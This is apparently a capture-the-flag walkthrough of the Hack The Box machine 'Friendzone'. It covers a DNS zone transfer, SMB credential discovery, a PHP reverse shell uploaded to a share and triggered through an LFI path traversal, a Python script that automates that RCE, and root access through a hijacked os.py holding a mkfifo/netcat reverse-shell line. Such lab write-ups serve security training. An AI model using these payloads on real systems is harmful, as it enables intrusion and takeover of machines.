DNS zone-transfer to check new domains & combo LFI, SMB to get a user shell & python library injection to get a root shell.

Description

  • Name: Friendzone
  • IP : 10.10.10.123
  • Author : askar
  • Difficulty : 5.1/10

Discovery

sudo nmap -sV -sC -v -T5 -A -oA scan --max-retries 2 10.10.10.123

Host is up (0.037s latency).
Not shown: 985 closed ports
PORT      STATE    SERVICE      VERSION
21/tcp    open     ftp          vsftpd 3.0.3
22/tcp    open     ssh          OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (EdDSA)
53/tcp    open     domain
| dns-nsid:
|  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp    open     http?
139/tcp   open     netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp   open     ssl/http     Apache httpd 2.4.29
| http-methods:
|_  Supported Methods: HEAD POST OPTIONS
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
445/tcp   open     netbios-ssn  Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
563/tcp   filtered snews
1259/tcp  filtered opennl-voice
2170/tcp  filtered eyetv
5432/tcp  filtered postgresql
5440/tcp  filtered unknown
5560/tcp  filtered isqlplus
9898/tcp  filtered monkeycom
49163/tcp filtered unknown
Aggressive OS guesses: Linux 3.18 (95%), Linux 3.2 - 4.8 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.8 (93%), DD-WRT (Linux 3.18) (92%), DD-WRT v3.0 (Linux 4.4.2) (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 46.149 days (since Sat Feb 16 16:12:54 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=248 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   FRIENDZONE<00>       Flags: <unique><active>
|   FRIENDZONE<03>       Flags: <unique><active>
|   FRIENDZONE<20>       Flags: <unique><active>
|   WORKGROUP

we have :

  • ftp (21)
  • ssh (22)
  • dns/tcp (53)
  • http (80)
  • smb (139)
  • https (443)
  • smb (445)

Ftp is not anonymous and I don’t start usually bruteforcing with random credentials the ssh, so what’s on dns on tcp port? If we see carefully on the scan of the 443 port there’s a certificate issued to friendzone.red, so we need to edit the /etc/hosts to add this domain as 10.10.10.123. We can now do some information gathering on dns with dig , and check if the zone-transfer is enabled without authentication.

dig axfr @10.10.10.123 friendzone.red

we get :

; <<>> DiG 9.11.3-1ubuntu1.5-Ubuntu <<>> axfr @10.10.10.123 friendzone.red
; (1 server found)
;; global options: +cmd
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.         604800  IN      AAAA    ::1
friendzone.red.         604800  IN      NS      localhost.
friendzone.red.         604800  IN      A       127.0.0.1
administrator1.friendzone.red. 604800 IN A      127.0.0.1
hr.friendzone.red.      604800  IN      A       127.0.0.1
uploads.friendzone.red. 604800  IN      A       127.0.0.1
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 35 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Wed Apr 03 21:17:45 CEST 2019
;; XFR size: 8 records (messages 1, bytes 289)

Now we have other subdomains :D .

Investigating on the http (80 port) we don’t find anything useful, just a static page :

Have you ever been friendzoned ?
if yes, try to get out of this zone ;)
Call us at : +999999999
Email us at: info@friendzoneportal.red

the next port we are going to scan is 139 samba :

smbmap -H friendzone.red

output :

[+] Finding open SMB ports....
[+] Guest SMB session established on friendzone.red...
[+] IP: friendzone.red:445      Name: friendzone.htb

        Disk                                                    Permissions
        ----                                                    -----------
        print$                                                  NO ACCESS
        Files                                                   NO ACCESS
        general                                                 READ ONLY
        Development                                             READ, WRITE
        IPC$                                                    NO ACCESS

Connecting to general

smbclient //friendzone.red/general
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\giovanni's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 21:10:51 2019
  ..                                  D        0  Wed Jan 23 22:51:02 2019
  creds.txt                           N       57  Wed Oct 10 01:52:42 2018

                9221460 blocks of size 1024. 6389908 blocks available
smb: \> %

Yeah,we got creds.txt which contains :

creds for the admin THING:

admin:WORKWORKHhallelujah@#

In development there aren’t useful files, but we can write into that directory (keep in mind). If we go to https://friendzone.red and investigate in the source page we have :

<title>FriendZone escape software</title>
<br>
<br>

<center><h2>Ready to escape from friend zone !</h2></center>

<center><img src="e.gif"></center>

<!-- Just doing some development here -->
<!-- /js/js -->
<!-- Don't go deep ;) -->

Well, we need to go to /js/js, and we get :

<p>Testing some functions !</p><p>I'am trying not to break things !</p>VWdSQWRSajVSUzE1NTQzMTg5OTdFSHpjeTIxUkUz<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->

Pwn User

We have two password but no login forms, so we need to enumerate better and try to reach the sites dumped from the dig command. We start with https://administrator1.friendzone.red , and here it is :

We can log in using the credentials found in the creds.txt file :

username : admin

password : WORKWORKHhallelujah@#

and we are redirected to the dashboard.php page which has the following content :

Smart photo script for friendzone corp !
* Note : we are dealing with a beginner php developer and the application is not tested yet !


image_name param is missed !

please enter it to show the image

default is image_id=a.jpg&pagename=timestamp

If we try to go to the page : https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp it gives us :

the images are located in the /images directory and we have two images (a and b), but what is timestamp? it’s probably a php page, but unfortunatly I couldn’t find a method to enumerate the files in the directory where the timestamp.php resides. Luckly the developer is a beginner and he forgot to secure the page against an LFI attack. We can upload a reverse shell into the /Development/ samba drive and we can try to reach the reverse shell from the website. However we don’t know where the drive is located on the machine, so we need to enumerate the samba service better with nmap :

nmap --script smb-enum-shares.nse --script-args=unsage=1 -p139 10.10.10.123

and we get :

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.123\Development:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 8
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>

So the samba directory where we can upload a reverse shell is located in /etc/Development/. To upload the reverse shell we can issue the following command :

echo "" | smbclient //10.10.10.123/Development -c 'put reverse-shell.php'

Then in one terminal open netcat on the port specified on the reverse-shell and from the browser we can try to call the shell with the following URL :

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../../etc/Development/reverse-shell

and…

To automate the process of the reverse shell upload and RCE :

import os
import requests

os.system('echo ""| smbclient //10.10.10.123/Development -c \'put revshell.php\
        \'')
url = "https://administrator1.friendzone.red/login.php"
url_rce = "https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&\
    pagename=../../../../../etc/Development/revshell"
login_data = {"username": "admin", "password": "WORKWORKHhallelujah@#"}

with requests.Session() as s:
    s.post(url, data=login_data, verify=False)
    s.get(url_rce, verify=False)

In one terminal execute the netcat listener and in the other launch the python script

Pwn Root

The first thing we can do is to check if there’s some credentials in /var/www/ :

$ ls -la
total 36
drwxr-xr-x  8 root root 4096 Oct  6  2018 .
drwxr-xr-x 12 root root 4096 Oct  6  2018 ..
drwxr-xr-x  3 root root 4096 Jan 16 22:13 admin
drwxr-xr-x  4 root root 4096 Oct  6  2018 friendzone
drwxr-xr-x  2 root root 4096 Oct  6  2018 friendzoneportal
drwxr-xr-x  2 root root 4096 Jan 15 21:08 friendzoneportaladmin
drwxr-xr-x  3 root root 4096 Oct  6  2018 html
-rw-r--r--  1 root root  116 Oct  6  2018 mysql_data.conf
drwxr-xr-x  3 root root 4096 Oct  6  2018 uploads
$ grep -R pass
admin/login.php:$password = $_POST["password"];
admin/login.php:if ($username==="admin" and $password==="WORKWORKHhallelujah@#"){
admin/index.html:      <input type="password" placeholder="password"/>
admin/index.html:      <input type="password" name="password" placeholder="password"/>
mysql_data.conf:db_pass=Agpyu12!0.213$
friendzoneportaladmin/login.php:$password = $_POST["password"];
friendzoneportaladmin/login.php:if (isset($username) && isset($password)){
friendzoneportaladmin/login.php:if ($username === "admin" && $password === "WORKWORKHhallelujah@#");
friendzoneportaladmin/index.html:<p>Password : <input type="password" name="password"></p>

And we find Agpyu12!0.213$ in mysql_data.conf. This credential works in ssh on the user friend (which is the only user with a login bash shell aside root). So now that we have ssh on the box we can transfer easily with scp privilege escalations reconnaissance scripts : LSE and pspy. On the server we can create an hidden directory in /tmp :

mkdir /tmp/.meow && cd /tmp/.meow

and then upload with scp the script with :

scp pspy64 friend@friendzone.red:/tmp/.meow
scp lse.sh friend@friendzone.red:/tmp/.meow

The smart-linux-enumeration tool launched with the -l1 flag didn’t find anything useful a part from the capabilities set to mtr-packet and the setuid on exim4. However even if there are lots of exploit of exim , we have on the box an updated version without vulnerabilites. mtr-packet instead doesn’t have vulnerability as of 2019.

Launching pspy64 we can see that every 2 minutes /opt/server_admin/reporter.py is executed by root.

friend@FriendZone:~$ cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
friend@FriendZone:~$ ls -la /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16 22:03 /opt/server_admin/reporter.py

The script is just importing the os library without launching commands, how can a program like this be vulnerable? with library hijacking :D LINK. Unluckly we can’t write into the /opt/server_admin directory, however if we check where the libraries are with :

friend@FriendZone:~$ python -c 'import sys; print "\n".join(sys.path)'

/usr/lib/python2.7
/usr/lib/python2.7/plat-x86_64-linux-gnu
/usr/lib/python2.7/lib-tk
/usr/lib/python2.7/lib-old
/usr/lib/python2.7/lib-dynload
/usr/local/lib/python2.7/dist-packages
/usr/lib/python2.7/dist-packages
friend@FriendZone:~$ ls -ld /usr/lib/python2.7/
drwxrwxrwx 27 root root 16384 Apr  9 21:43 /usr/lib/python2.7/

We can see that we can write into the /usr/lib/python2.7/

So if we write into the os.py file the following script :

f = open("/root/root.txt", "r")
flag = f.read()
fi = open("/tmp/xd", "w")
fi.write(flag)

and wait 2 minutes, we will see that the flag will compare in /tmp/xd. If you’re anxious as me in this moment you can use the command watch -n 1 -d 'cat /tmp/xd' :

However the root flag is not very satisfying as getting root shell. To get a root shell we can reuse the original os.py file and add to the end’s file

system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 9999 >/tmp/f')

and then listen with netcat